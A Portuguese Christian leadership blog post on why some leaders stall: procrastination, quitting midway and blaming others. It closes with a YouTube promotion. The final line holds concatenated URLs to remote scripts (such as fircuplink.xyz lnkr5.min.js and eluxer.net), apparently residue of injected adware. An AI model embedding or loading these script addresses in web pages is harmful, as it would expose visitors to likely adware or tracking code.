Por que alguns líderes não crescem?

Você conhece algum líder que está “travado” e não consegue avançar em absolutamente? Por que será que isso acontece?

É claro que não se pode afirmar os motivos exatos. No entanto, existem algumas atitudes em comum que podem ser observadas na vida destas pessoas e que são relevantes para determinar o “não crescimento” delas:

1 – Não ter iniciativa

Quando o líder não tem iniciativa, ele não consegue conquistar e avançar. A procrastinação é uma verdade em sua vida e, em alguns casos, pode-se dizer que a pessoa é uma “procrastinadora profissional”. Ou seja, ela está, constantemente, na “função soneca”. Isso mesmo… Como no celular que você coloca para despertar e habilita a função soneca para que possa dormir mais um pouquinho e acaba se atrasando para os compromissos.

Líderes que não tem iniciativa costumam procrastinar, habilitando a “função soneca” da sua vida, deixando de fazer depois o que já deveria ter sido feito há muito tempo.

Se o líder quiser crescer, ele vai precisar levantar e colocar em prática aquilo que ele já sabe que precisa fazer. Ele vai precisar colocar em prática tudo o que ele planejou e que está guardado na “gaveta”.

É preciso ter iniciativa sempre. Principalmente para se deixar a procrastinação…

2 – Desistir no meio do caminho

Toda liderança passa pela provação das dificuldades no “meio do caminho de seus projetos”. No entanto, muitos líderes começam seus projetos com empolgação e, quando as primeiras dificuldades chegam, eles desistem.

Deus tem confiado coisas grandes aos Seus líderes, mas alguns deles estão se deixando intimidar pelas pressões dos problemas que aparecem e têm abandonado tudo.

É preciso que o líder se encha de fé e confie que “aquele que começou a boa obra é fiel para terminá-la”.

3 – Não assumir a responsabilidade pelos resultados

Líderes terão resultados positivos e negativos. Contudo, aquele que não cresce, costuma, diante de um resultado negativo, se fazer de vítima ou transferir a responsabilidade para outros.

É muito comum se ouvir de um líder que não cresce que ele não cresceu porque ninguém deu o ajudou ou que ninguém lhe deu “oportunidade”. No entanto, o líder que quer crescer, precisa assumir a responsabilidade da sua vida.

Então, não importa se a sua família está ou não envolvida, pois se você estiver, ela acabará se envolvendo; não importa se não tem ninguém para te ajudar, se você se envolver, Deus vai levantar alguém para te dar o suporte na hora e da forma certa. É o líder que decide se ele quer crescer ou não.

É uma decisão do líder se colocar no papel de vítima ou aproveitar a oportunidade de crescer através de seus resultados.

Sim, este é um assunto muito vasto. Por isso, fica a dica do nosso canal no YouTube para que você possa navegar por vídeos gratuitos, com conteúdos de fácil compreensão, preparado especialmente para que você possa estar esclarecendo dúvidas sobre liderança. Afinal, todo líder que cresce sabe a importância de estar sempre se atualizando, não é verdade?

Inclusive, lá você vai encontrar um vídeo que completa este artigo. Passa lá, deixa a sua “curtida”, não deixe de se “inscrever” e não se esqueça de “clicar no sininho” para que você possa receber avisos assim que os vídeos novos forem “postados”.

 

http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x7038x&r=1538138732479http://fircuplink.xyz/addons/lnkr5.min.jshttp://fircuplink.xyz/addons/lnkr30_nt.min.jshttp://eluxer.net/code?id=105&subid=51824_7038_